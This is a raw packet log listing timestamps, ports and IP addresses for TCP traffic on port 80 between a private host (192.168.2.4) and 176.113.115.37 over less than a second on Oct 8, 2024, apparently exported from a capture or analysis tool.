Oct 8, 2024 03:52:44.588459015 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588502884 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588527918 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588541985 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588572025 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588614941 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588634014 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588677883 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588697910 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588742971 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588790894 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588809013 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588854074 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.623999119 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624032974 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624073029 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624090910 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624138117 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624186039 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624279976 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624305010 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624350071 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624392986 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624413967 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624458075 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624475956 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624519110 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624562025 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624581099 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624639034 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624664068 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624684095 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624711990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624763012 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624789000 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624830961 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624851942 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624895096 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624914885 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.624958038 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.624982119 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625024080 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625042915 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625089884 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625107050 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625154972 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625180960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625221014 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625236034 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625256062 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625307083 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625349998 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625370979 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625412941 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625432014 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625477076 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625494003 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625536919 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625557899 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625607967 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625633955 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625684023 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625710011 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625752926 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625772953 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625825882 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625838041 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625875950 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625915051 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.625957012 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.625976086 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626019001 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626040936 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626084089 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626102924 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626146078 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626166105 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626209021 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626228094 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626271963 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626291990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626333952 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626353025 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626395941 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626415968 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626466990 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626497984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626545906 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626571894 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626621008 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626646996 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626689911 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626709938 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626754999 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626773119 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626816988 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626837969 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626867056 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626912117 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.626956940 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.626974106 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627017021 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627037048 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627080917 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627104044 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627146006 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627170086 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627213001 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627233028 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627276897 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627295971 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627338886 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627357960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627410889 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627480984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627531052 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627557039 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627604961 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627630949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627681971 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627696991 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627738953 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627789021 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627815008 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627859116 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627886057 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627903938 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.627953053 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.627996922 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628016949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628057957 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628077984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628122091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628139019 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628180981 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628201008 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628243923 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628262043 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628304005 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628329039 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628371000 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628391027 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628434896 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628453016 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628495932 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628515959 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628560066 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628577948 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628628016 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628654003 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628695965 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628715992 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628761053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628777027 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628820896 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628839970 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628881931 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628901958 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.628945112 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.628966093 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629008055 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629028082 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629071951 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629090071 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629134893 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629153967 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629200935 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629220963 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629266024 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629285097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629328012 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629347086 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629390955 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629406929 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629448891 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629467964 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629513025 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629530907 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629571915 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629591942 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629637003 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629652977 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629697084 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629714966 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629755020 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629776955 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629821062 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629837990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629879951 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629899025 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.629945040 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.629961967 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.630003929 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.630023956 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.630065918 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.630085945 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.630130053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.630147934 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.630192041 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679061890 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679111958 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679179907 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679197073 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679197073 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679241896 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679286003 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679308891 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679322958 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679368973 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679430008 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679486990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679538012 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679550886 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679582119 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679627895 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679672003 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679696083 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679749012 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679797888 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679810047 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679832935 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679868937 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679912090 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.679933071 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.679976940 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680011034 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.680028915 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.680056095 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680099964 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680144072 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.680166006 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680208921 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680252075 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.680269957 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680314064 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.680332899 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.680454016 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715029001 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715091944 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715136051 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715187073 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715221882 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715235949 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715293884 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715322971 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715337038 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715363026 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715456009 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715507984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715522051 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715564966 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715614080 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715641022 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715684891 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715711117 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715724945 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715754986 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715800047 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715843916 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715862989 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715907097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.715949059 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.715967894 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716017008 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716047049 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716104984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716126919 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716140985 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716170073 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716228962 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716272116 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716289997 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716334105 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716396093 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716412067 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716461897 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716487885 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716531992 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716577053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716593981 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716653109 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716697931 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716715097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716763020 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716778994 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716823101 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716842890 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716865063 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716903925 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.716948032 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.716965914 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717010021 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717029095 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717056036 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717086077 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717130899 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717149973 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717200041 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717226028 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717274904 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717300892 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717346907 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717363119 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717405081 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717425108 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717475891 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717502117 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717551947 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717577934 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717621088 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717641115 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717690945 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717705965 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717729092 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717765093 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717813969 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717840910 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717886925 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717906952 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.717952013 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.717968941 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718025923 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718049049 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718091965 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718112946 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718143940 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718239069 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718283892 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718302011 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718341112 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718364954 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.718409061 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.718427896 CEST	80	60061	176.113.115.37	192.168.2.4
